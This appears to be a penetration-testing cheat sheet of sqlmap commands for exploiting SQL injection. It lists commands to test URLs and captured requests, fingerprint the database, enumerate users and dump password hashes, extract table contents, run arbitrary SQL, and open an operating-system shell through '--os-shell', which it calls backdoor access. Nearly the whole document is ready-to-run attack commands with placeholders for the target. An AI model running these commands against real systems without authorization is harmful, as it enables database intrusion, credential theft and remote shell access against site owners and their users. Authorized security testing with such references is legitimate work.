SQLMap commands

Test URL and POST data and return database banner (if possible)

./sqlmap.py --url="<url>" --data="<post-data>" --banner

Test Multiple URLs with default values and extract database names, saving results

./sqlmap.py -m urls.txt --batch --dbs --output-dir=result

Parse request data and test (request data can be obtained with Burp)

./sqlmap.py -r <request-file> <options>

Fingerprint (provides more information than banner)

./sqlmap.py -r <request-file> --fingerprint

Get database username, name, and hostname

./sqlmap.py -r <request-file> --current-user --current-db --hostname

Check if user is a database admin

./sqlmap.py -r <request-file> --is-dba

Get database users and password hashes

./sqlmap.py -r <request-file> --users --passwords

Enumerate databases

./sqlmap.py -r <request-file> --dbs

List tables for one database

./sqlmap.py -r <request-file> -D <db-name> --tables

Other database commands

./sqlmap.py -r <request-file> -D <db-name> --columns

Enumeration flags

./sqlmap.py -r <request-file> -D <db-name>
                  -T <tbl-name>
                  -C <col-name>
                  -U <user-name>

Extract data

./sqlmap.py -r <request-file> -D <db-name> -T <tbl-name> -C <col-name> --dump

Execute SQL Query

./sqlmap.py -r <request-file> --sql-query="<sql-query>"

Append/Prepend SQL Queries

./sqlmap.py -r <request-file> --prefix="<sql-query>" --suffix="<sql-query>"

Get backdoor access to SQL server (can provide shell access)

./sqlmap.py -r <request-file> --os-shell